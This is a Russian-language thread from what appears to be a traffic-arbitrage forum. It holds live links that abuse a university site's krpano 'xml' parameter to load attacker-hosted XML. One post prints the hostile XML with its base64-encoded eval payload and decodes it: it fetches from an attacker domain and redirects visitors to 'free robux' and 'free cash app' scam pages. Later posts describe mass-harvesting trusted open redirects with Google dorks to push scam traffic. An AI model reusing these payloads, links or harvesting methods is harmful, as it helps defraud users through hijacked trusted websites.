Статья Методы добычи трафика на ваши проекты | 2025

[TM013]

Через такое еще добывает траф. Автор вроде профи, сможет объяснить тех. часть))

https://www.southerntech.edu/tours/ft_myers/?id=ncod&xml=https://drpi.tooprob.top/rob/video/?video=free-robux_n8i2v6

 

[Inzuan]

Через такое еще добывает траф. Автор вроде профи, сможет объяснить тех. часть))

https://www.southerntech.edu/tours/ft_myers/?id=ncod&xml=https://drpi.tooprob.top/rob/video/?video=free-robux_n8i2v6

не понял вопроса, типа сделать обзор на этот вид трафа? скам на робуксы?

 

[Dorik]

Кто с X работает скажите сечас так же кучно залетает как и пару лет назад или совсем выжался ?

 

[TM013]

не понял вопроса, типа сделать обзор на этот вид трафа? скам на робуксы?

Конечная цель не интересна, она может быть любой. Интересна техническая часть редиректа с трастового ресурса. Обрати внимание на ссылку

https://www.southerntech.edu/tours/ft_myers/?id=wrlb&xml=https://fpbl.tooprob.top/cshp/video/?video=free-cash-app_l359fm89

Здесь скорее всего используется xml инъекция.

 

[cashapp]

Особо никаких важных подводных камней

Подводные - крипта

 

[chiefchain]

Конечная цель не интересна, она может быть любой. Интересна техническая часть редиректа с трастового ресурса. Обрати внимание на ссылку

https://www.southerntech.edu/tours/ft_myers/?id=wrlb&xml=https://fpbl.tooprob.top/cshp/video/?video=free-cash-app_l359fm89

Здесь скорее всего используется xml инъекция.

Давай посмотрим =)
Понятно сразу, что это редирект, но вот подгружается XML по любому URL, то есть можно загрузить свой и выполнить там свой JS-код. Окей, а как это? Просто скопируем значение параметра 'xml' и перейдем только по нему, без лишних ссылок.

<krpano version="1.0.8.15">
<layer name="js_loader" type="container" visible="false" onloaded=" js(eval(var w=atob("Y29uc3QgcXVlcnlQYXJhbXM9bmV3IFVSTFNlYXJjaFBhcmFtcyh3aW5kb3cubG9jYXRpb24uc2VhcmNoKSxpZD1xdWVyeVBhcmFtcy5nZXQoImlkIik7aWQ/ZmV0Y2goYGh0dHBzOi8vdG9wcm9iLnRvcC9jc2hwL3ZpZGVvL3JlZDIucGhwP3ZpZGVvPWZyZWUtY2FzaC1hcHBfbDM1OWZtODkuaHRtbGApLnRoZW4oZT0+ZS50ZXh0KCkpLnRoZW4oZT0+e3RyeXtsZXQgcj1KU09OLnBhcnNlKGUpO3IucmVkaXJlY3RVcmwmJih3aW5kb3cubG9jYXRpb24uaHJlZj1yLnJlZGlyZWN0VXJsKX1jYXRjaCh0KXtkb2N1bWVudC5vcGVuKCksZG9jdW1lbnQud3JpdGUoZSksZG9jdW1lbnQuY2xvc2UoKX19KS5jYXRjaChlPT57Y29uc29sZS5lcnJvcigiRXJyb3IgZmV0Y2hpbmcgdGhlIHVzZXIgYWdlbnQ6IixlKX0pOmNvbnNvbGUuZXJyb3IoIk5vIik7R2Vla3Nmb3JHZWVrcw==");eval(w));); "/>
</krpano>

Два равно на конце, сразу можем плясать с этой кодировкой, которая у нас в atob("значение") в любой base64-decoder.

const queryParams = new URLSearchParams(window.location.search);
const id = queryParams.get("id");

if (id) {
    fetch(`https://toprob.top/cshp/video/redd2.php?video=free-cash-app_l359fm89.html`)
        .then(response => response.text())
        .then(text => {
            try {
                const result = JSON.parse(text);
                if (result.redirectUrl) {
                    window.location.href = result.redirectUrl;
                }
            } catch (error) {
                document.open();
                document.write(text);
                document.close();
            }
        })
        .catch(error => {
            console.error("Error fetching the user agent:", error);
        });
} else {
    console.log("No");
}

Бабамц, вот и получаем эту хрень. Почему-то даже остался копирайт GeeksforGeeks, видимо там сидят совсем ленивые люди, кто делали это, но не суть. Чё ваще делает эта хрень? Получает параметры страницы, на которой мы находимся, записывает их в queryParams. После получается самое интересное (но не понятное для чего сделано, по крайне мере я не могу уловить суть этого), он достает параметр ID, который у нас ВОТ_ТУТ.

Если он у нас есть и вообще существует (именно значение существует), то выполняет запрос на toprob.top/cshp/video/... После чего он парсится как JSON, получает redirecturl, и меняет в браузере ссылку на ту которая пришла в редирект-юрл. А если его не существует, ну, то похер. Мы просто выведем вам 'No' в консоль и забьем на вас. Странно, очень странно, но ладно) Как-то так это работает =) Надеюсь внятно разъяснил.

А этот скриншот на случай если не понятно почему в юрле '\/', а переходим мы нормально. (экранизация JS можете найти в интернете почитать)

Было бы хорошо узнать как находить такие редиректы, в больших количествах =) Не обязательно на XML-инъекции, любые трастовые редиректы.

 

[TM013]

Было бы хорошо узнать как находить такие редиректы, в больших количествах =) Не обязательно на XML-инъекции, любые трастовые редиректы.

Хороший тех. разбор тянущий на отдельную статью.)) Собирают такие трастовые редики дорками. Здесь есть статья как парсить средствами гугла. Для наших целей сгодится - threads/116628/
Напарсить ресы с дорками, проверить на существование нужные нам страницы или ответы, ну а дальше дело техники. Вариант попроще, посмотреть кеи которыми спамят таким методом и пробить эти редики в гугле. Нужные трастовые редики отобрать.

 

[po4emuonaneya]

Было бы хорошо узнать как находить такие редиректы, в больших количествах =) Не обязательно на XML-инъекции, любые трастовые редиректы.

Aels писал об этом в начале 23 года, если нужно, кину, недавно проверял этот метод, вроде работает

 

[fishingobtusely]

если нужно, кину

Поискал по форуму, не нашел, закинь в тему - спасибо.

 

[sikidok]

Aels писал об этом в начале 23 года, если нужно, кину, недавно проверял этот метод, вроде работает

закинь в тему
спасибо!

 

[TM013]

закинь в тему
спасибо!

Скорее всего это имелось ввиду - /threads/88806/

 

[po4emuonaneya]

Скорее всего это имелось ввиду - /threads/88806/

/threads/127311/
Вот его 3 статьи в 1 месте, но смотри, какие-то методы теряют актуальность, удачи)

 

[KGMT_LorD]

норм статья, я вот давно не занимался трафиком и не знал с чего начинать. Мне норм, спасибо.

 

[Dimon]

Кто с X работает скажите сечас так же кучно залетает как и пару лет назад или совсем выжался ?

если ты про залил видос, воткнул 20 тэгов порнушных, и он за ночь 1кк набрал, то не, так не катит щас. если про покупной траф, хз